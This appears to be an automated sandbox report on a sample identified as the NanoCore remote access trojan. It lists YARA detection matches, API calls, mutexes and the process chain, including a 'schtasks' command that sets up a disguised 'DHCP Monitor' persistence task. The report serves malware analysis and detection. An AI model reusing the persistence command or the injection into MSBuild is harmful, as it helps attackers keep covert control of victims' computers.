        Source: 12.2.MSBuild.exe.45ceac4.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.45ceac4.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.45d30ed.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.45d30ed.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.35917f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.35917f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.MSBuild.exe.4239c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.4239c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.MSBuild.exe.4239c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.MSBuild.exe.5e00000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.5e00000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.45ceac4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.45ceac4.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.MSBuild.exe.42430ed.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.42430ed.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.MSBuild.exe.5610000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.5610000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.MSBuild.exe.423eac4.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.423eac4.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.MSBuild.exe.3201358.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.3201358.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.176cb50.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.45c9c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.45c9c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.45c9c8e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.MSBuild.exe.423eac4.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.423eac4.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.MSBuild.exe.5e04629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.5e04629.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.MSBuild.exe.5e00000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.MSBuild.exe.5e00000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.qnJXJsqt1M.exe.17297f8.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.qnJXJsqt1M.exe.16ec7e0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.16ec7e0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.qnJXJsqt1M.exe.17293d8.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.17293d8.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.qnJXJsqt1M.exe.17293d8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.17293d8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: MSBuild.exe, 00000005.00000002.246059966.00000000030E1000.00000004.00000001.sdmpBinary or memory string: *.sln
        Source: classification engineClassification label: mal100.troj.evad.winEXE@11/10@13/3
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B1CE7A GetLastError,FormatMessageW,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0AB84 AdjustTokenPrivileges,CloseHandle,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_054212BA AdjustTokenPrivileges,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_05421283 AdjustTokenPrivileges,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B1E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B16532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,FindCloseChangeNotification,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B2C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AD406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeFile created: C:\Users\user\AppData\Roaming\hdoydskbdx
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{2ad4e32f-c687-4329-b5e5-302ef0e0906d}
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeFile created: C:\Users\user~1\AppData\Local\Temp\autB7CF.tmp
        Source: qnJXJsqt1M.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: qnJXJsqt1M.exeVirustotal: Detection: 67%
        Source: qnJXJsqt1M.exeMetadefender: Detection: 37%
        Source: qnJXJsqt1M.exeReversingLabs: Detection: 79%
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeFile read: C:\Users\user\Desktop\qnJXJsqt1M.exe
        Source: unknownProcess created: C:\Users\user\Desktop\qnJXJsqt1M.exe 'C:\Users\user\Desktop\qnJXJsqt1M.exe'
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp'
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe 'C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe'
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp'
